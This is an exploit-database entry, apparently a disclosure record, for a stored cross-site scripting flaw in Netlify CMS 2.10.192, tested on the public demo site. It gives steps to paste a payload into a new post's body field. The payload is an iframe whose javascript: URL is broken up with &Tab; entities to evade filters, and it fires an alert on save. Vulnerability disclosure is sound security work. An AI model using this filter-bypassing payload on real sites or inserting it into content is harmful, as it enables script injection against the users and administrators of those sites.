Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)

Author: tmrswrr
type: webapps
platform: java
port: nan
date_added: 2023-07-11 
date_updated: 2023-07-15 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr
# Vendor Homepage: https://decapcms.org/docs/intro/
# Software Link: https://github.com/decaporg/decap-cms
# Version: 2.10.192
# Tested on: https://cms-demo.netlify.com


Description:

1. Go to new post and write body field your payload:

https://cms-demo.netlify.com/#/collections/posts

Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>

2. After save it XSS payload will executed and see alert box